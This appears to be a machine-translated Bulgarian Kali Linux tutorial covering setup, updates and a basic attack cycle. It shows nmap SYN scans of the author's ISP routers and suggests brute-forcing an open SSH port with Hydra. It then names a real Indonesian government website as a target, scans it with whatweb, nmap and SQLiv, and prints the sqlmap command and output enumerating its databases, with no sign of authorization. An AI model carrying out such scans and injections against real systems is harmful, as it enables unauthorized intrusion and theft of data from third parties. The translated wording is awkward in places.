Урок за Kali Linux

Kali Linux Tutorial



Ако сте експерт или поне сте запознати с Linux, команди и среда, току -що сте инсталирали Kali Linux на вашата машина, искате да станете майстор на Kali Linux или етичен хакер, тогава сте на правилното място. В тази статия ще разгледам урок за Kali Linux за потребители на Linux, които още не са запознати с Kali, и ще ви запозная с някои от основните техники, използвани за хакване и тестване на сигурността, докато използвате Kali.

Какво е Kali Linux?

Kali Linux, ( за първи път пуснат на 13 март 2013 г. ), който беше официално известен като BackTrack, разработен от фирмата за сигурност Offensive Security, е криминалистична и фокусирана върху сигурността дистрибуция, базирана на клона за тестване на Debian. Kali Linux е проектиран с тестване за проникване, възстановяване на данни и откриване на заплахи. По -рано тази година проектът премина към модел на подвижна версия, в опит да предостави по -актуални помощни програми за сигурност на потребителите на дистрибуцията. Kali Linux е безплатна и винаги ще бъде. Той включва 600+ инструмента за тестване на проникване.







Защо Kali Linux? Подходящо ли е за вас?

Напоследък Kali Linux придоби голяма популярност. И има причина за това. Хакването се завръща като най-готиното нещо за правене в популярната култура и това може да се отдаде значително на телевизионния сериал Mr. Robot. Популярността на г -н Робот помогна на Kali Linux да привлече нови потребители. Хората, които почти не познават Linux или нещо, свързано с компютърната сигурност, сега се опитват да използват Kali като основна дистрибуция на Linux.



Нашето най -модерно разпределение за тестване на проникване. - Кали Linux разработчици. (Написано е на главната страница на Kali.org в най -горната част на страницата.) Какво получавате от това изявление? Забелязвате ли това: APTD (Advanced Penetration Testing Distribution)? Тук няма термин хакване буквално. Kali Linux е същият като другите дистрибуции на Linux. Просто казано, това е дистрибуция на Linux, снабдена с инструменти, свързани със сигурността, и насочена към експерти по мрежова и компютърна сигурност. Използването на Kali Linux обаче се фокусира само върху сигурността и криминалистиката.



Linux дистрибуция не е нищо повече от пакет, съдържащ ядрото на Linux, набор от основни помощни програми и приложения и някои настройки по подразбиране. Така че, Kali Linux не предлага нещо уникално в този смисъл, повечето от предоставените инструменти могат да бъдат инсталирани на всяка Linux дистрибуция.





Kali Linux е специално насочена да отговаря на изискванията за професионално проникване и одит на сигурността. Той е насочен към определена подгрупа потребители на Linux. Pentesters, хакери и др. Не се препоръчва разпространение, ако очаквате Kali за настолен компютър с общо предназначение за разработка, уеб дизайн, игри, офис и т.н. Kali може да ви даде някои предизвикателства, дори ако сте опитен потребител на Linux .

НЕЩА, КОИТО ТРЯБВА ДА СЛЕД ИНСТАЛИРАНЕ НА KALI LINUX

След като инсталирате Kali Linux, може да се чудите какво да направите по -нататък с това, нали ?. Всеки се сблъсква с този проблем, не се притеснявайте.



СТЪПКА 1: НАСТРОЙТЕ РЕПОЗИТОРИЯТА

Първо, може би вече знаете това, но е важно да настроите хранилището правилно. Както казах, моделът на текущата версия на Kali Linux се опитва да предостави по -актуални помощни програми за сигурност на потребителите на дистрибуцията. Като цяло, ако имате прясно инсталиран Kali Linux, хранилището препраща към носителя, който използвате за инсталиране. За да поправите това, трябва да промените хранилището в официалното хранилище на Kali Linux. Изискваният файл се намира под /etc/apt/sources.list . Отворете файла с текстов редактор на листа и заменете хранилището по подразбиране на това официално хранилище на Kali Rolling:

deb http://http.kali.org/kali kali-rolling main contrib non-free # For source package access, uncomment the following line # deb-src http://http.kali.org/kali kali-rolling main contrib non-free 

СТЪПКА 2: АКТУАЛИЗИРАНЕ И НАДОСТРАНЯВАНЕ НА ВАШИЯ KALI LINUX

След тази актуализация и надстройте системата си, синхронизирайте Kali Linux с най -новата версия. За да направите това, отворете терминала и въведете:

apt update -y && apt upgrade -y && apt dist-upgrade 

Командата apt update изтегля и извлича пакета с информация от хранилищата и ги актуализира, за да получи информация за най -новите версии на пакетите и техните зависимости.

Командата apt upgrade изтегля и инсталира по -нова версия на пакетите от инсталирани пакети на Kali Linux, стига да няма грешки в зависимост.

Apt dist-upgrade ще актуализира всички пакети до най-новата налична версия, независимо от всичко. Също така инсталирайте и премахнете зависимости, ако е необходимо (инсталирайте зависимости, за да задоволите пакетите, очевидно, но също така премахнете зависимости, които са останали осиротели, ако пакет, който е актуализиран, вече не се нуждае от зависимостта.

ОСНОВНА КОНЦЕПЦИЯ ЗА ИЗПИТВАНЕ НА ПЕНЕТРАЦИЯ С KALI LINUX

След като успешно извършите тези стъпки, има три основни неща, които можете да направите с Kali Linux въз основа на целевата система, включително:

  1. Хакване на безжична мрежа - хакване на Wifi, фишинг, отравяне с ARP и др.
  2. Хакване на уеб приложения -SQL инжектиране, фалшифициране на заявки между сайтове (CSRF), уеб фишинг и др.
  3. Хакване на устройства - Използвайте целевата машина, за да получите контрол над нея.

Не включвам хакерство на IoT, това не означава, че Kali Linux няма способности за тази цел. Но буквално може да принадлежи и на Device Hacking. Тъй като устройството има външен вид и форма. В този урок обхванах основните знания за тях. Тъй като Kali Linux е огромен, той не се побира в една статия!

Трябва също да знаете цикъла или процедурата за тестване на проникване. Те са:

  1. Разузнаване - събиране на информация
  2. Сканиране
  3. Операция
  4. След експлоатация

БЕЗЖИЧНА МРЕЖА ХАКИРАНЕ С KALI LINUX

По отношение на хакерството на безжична мрежа, жертвата може да варира. Тъй като безжичните мрежи се състоят от няколко неща, като ISP (доставчик на интернет услуги), рутера и неговите партньори (модем, хъб, комутатор и т.н.) и клиентите (потребители, видеонаблюдение, отдалечен компютър и т.н.). Те също имат уязвими възможности.

Интернет е голяма и сложна съвкупност от мрежов хардуер, свързан заедно чрез шлюзове. Проследяването на маршрута, по който вървят вашите пакети, е важно, за да знаете как достигате до определено име на хост или целеви IP адрес.

Kali Linux има вграден инструмент, наречен Traceroute. Traceroute използва времето на IP протокола за поле на живо и се опитва да предизвика ICMP TIME_EXCEEDED отговор от всеки шлюз по пътя към някакъв хост. Опитите на Traceroute да проследи маршрута, който IP пакет би последвал до някой интернет хост, като стартира сондажни пакети с малък TTL (време за живот), след което слушане за ICMP превишава времето за отговор от шлюз. Ще ви дам и пример как да проследите ISP рутер, използван за обработка на връзката ни, използвайки Traceroute.

1. Признаване

Събирането на информация е най -важният скок, не пропускайте тази стъпка. В тази стъпка целта ни е да получим възможно най -много полезна информация, която можем да получим, а след това тази информация се използва за по -нататъшни стъпки.

Първо отворете терминал и въведете тази команда, за да започнете да проследявате пътя към сайта, в този случай зададох сайта на google.com.

traceroute google.com 

Traceroute Екранна снимка

2. Сканиране

След като стартираме командите, той ще изброява къде последователно отива нашият пакет. Както можете да видите по -горе, имам 3 хопа, един от които е моят ISP сървър. Първият IP в списъка е моят рутер, който действа като шлюз. И следващите две от тях принадлежат на моя интернет доставчик. Сега нека проверим услугата, която те изпълняват, използвайки Nmap. И така, целите, които ще сканираме, са 10.152.192.1 и 10.13.223.102 . В терминала изпълних следната команда:

nmap -v -sS [IP Target] -Pn 

Нека разбием аргумента на командата:

-v = Активиране на режима на подробност

-sS = Използвайте TCP SYN техника за сканиране

-Pn = Третирайте всички хостове като онлайн -пропуснете откриването на хост

И ето резултата, който получихме.

nmap екранна снимка 2

За съжаление всички портове са включени 10.152.192.1 са филтрирани, това означава, че всички входящи TCP връзки са блокирани от IDS или защитната стена на този IP. Сега, нека направим още едно сканиране към втората цел.

nmap екранна снимка 1

3. Операция

В тази процедура нямам намерение да правя реалната експлоатация, вместо това ще ви покажа как. Въз основа на резултата от сканирането на Nmap по -горе знаем, че този IP има SSH сървър, работещ на порт 22, и е отворен. Отворено е за груба сила, хаха! Открихме дупката, този SSH сървър е възможната дупка, в която можем да се опитаме да получим достъп. В Kali Linux има няколко инструмента, които поддържат bruteforce или речникови атаки срещу SSH протокол. Най -популярната и мощна е Hydra.

Добре, това беше основна процедура за провеждане на тест за проникване срещу целеви сървър, който в нашия пример тук е моят ISP сървър.

УЕБ ПРИЛОЖЕНИЯ, ХАКИРАНИ С KALI LINUX

Всъщност, ако сте страстни в това, можете да настроите хакерската си среда, като инсталирате DWVA (Проклето уязвимо уеб приложение) във вашия Kali Linux. Това е уеб приложение PHP/MySQL, което има куп уязвими дупки. Неговите основни цели са да бъдат помощ за специалистите по сигурността, за да тестват своите умения и инструменти в правна среда, и да помогнат на уеб разработчиците да разберат по -добре процесите на защита на уеб приложения. Можете да получите DWVA безплатно в Github тук: https://github.com/ethicalhack3r/DVWA.

Засега ще ви покажа как да правите хакване на уеб приложения на истински сайт. Но обещайте ми, че е ограничено само до образователни цели. Ще симулираме истинска атака на реално място, използвайки SQL инжекция.

Предпоставка

Обхванати инструменти:

-Whatweb (предварително инсталиран)

-Nmap (предварително инсталиран)

- SQLiv (инсталирайте ръчно)

-SQLMap (предварително инсталиран)

Нуждаем се от още един допълнителен инструмент, който е достъпен в Github тук: https://github.com/Hadesy2k/sqliv, първо го инсталирайте в нашия Kali Linux. Този инструмент, наречен SQLiv, който може да извършва целенасочено сканиране, като предоставя конкретен домейн (с обхождане). Въведете терминала:

git clone https://github.com/Hadesy2k/sqliv.git cd sqliv && sudo python2 setup.py -i 

Цел: www.trenggalekkab.go.id

1. Признаване

Събираме колкото се може повече полезна информация. Можем да отворим уеб страницата и да открием какво приложение работи на този сайт. Първо, нека проверим какъв вид уебсайт е това. Ще използваме whatweb за това.

whatweb www.trenggalekkab.go.id 

Каква уеб екранна снимка

Както можете да видите горния резултат, целта се намира в Индонезия. Той работи Apache v2.2.27 на своя уеб сървър и също има PHP v5.4.31 , има IP адрес 103.247.21.142 . Добре, обърнете внимание на това. Може да се наложи да посетите уеб страницата му, да потърсите файла или страницата, конструирани, URL параметри или дори формуляр за вход. Засега се нуждаем от този IP адрес за следващата стъпка, която е сканирането.

2. Сканиране

Както и преди, отново използваме Nmap, за да сканираме какви портове и услуги работят на целта.

nmap -v -sS 103.247.21.142 

И ето резултата, който получихме:

Completed SYN Stealth Scan at 21:22, 261.93s elapsed (1000 total ports) Nmap scan report for ip-103-247-21-142.wifian.net.id (103.247.21.142) Host is up (0.069s latency). Not shown: 985 closed ports PORT STATE SERVICE 21/tcp open ftp 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop3 111/tcp open rpcbind 143/tcp open imap 212/tcp open anet 443/tcp open https 465/tcp open smtps 587/tcp open submission 993/tcp open imaps 995/tcp open pop3s 3128/tcp filtered squid-http  3306/tcp open mysql  

Има куп отворени портове, които обработват всяка услуга към целта, но тази, която изглежда привлекателна, е тази услуга mysql на порт 3306. Посочено е, че този сайт използва mysql да управляват информацията си в бази данни. Тогава се чудя дали на този сайт има уязвимости за SQL Injection. И така, сканирам отново сайта с помощта на SQLiv, който току -що сме инсталирали. Въведох командата:

sqliv -t www.trenggalekkab.go.id 

SQLHacking ScreenShot1

На този сайт намерихме 2 възможни уязвими URL адреса на SQL. Забележете тези URL адреси.

3. Операция

Добре, имаме SQL уязвими URL адреси и готови за изпълнение. За да направим това, ще използваме SQLMap. Синтаксисът е:

sqlmap [Vulnerable URL] --dbs 

Командата трябва да изглежда така:

 sqlmap -u "http://www.trenggalekkab.go.id/berita.php?page=208" --dbs 

Аргументът –dbs е да каже на SQLMap да получи целеви бази данни. Ето резултата, който получихме:

[INFO] the back-end DBMS is MySQL web application technology: PHP 5.4.31, Apache 2.2.27 back-end DBMS: MySQL 5 [21:46:04] [INFO] fetching database names [21:46:04] [INFO] the SQL query used returns 2 entries [21:46:04] [INFO] resumed: information_schema [21:46:04] [INFO] resumed: trengkab_trg available databases [2]: [*] information_schema [*] trengkab_trg 

SQLMap намери 2 бази данни, но само една от тях, която съдържа чувствителни данни, като например акаунт за администраторски идентификационни данни. Това е на trengkab_trg. След като открием базите данни, има още една стъпка, която трябва да направим. Това означава да намерите таблиците и колоните и последната стъпка е да изхвърлите данните. Няма да ви показвам как тук в този раздел, използвайки тази цел. Поне знаете основната идея за цикъла на атака и използването на някои инструменти.

ХАКВАНЕ НА УСТРОЙСТВА

В бъдеща статия на този сайт ще разгледаме хакването на устройства, следете. Като предварително предупреждение ще искате да се уверите, че познавате някои Python за това.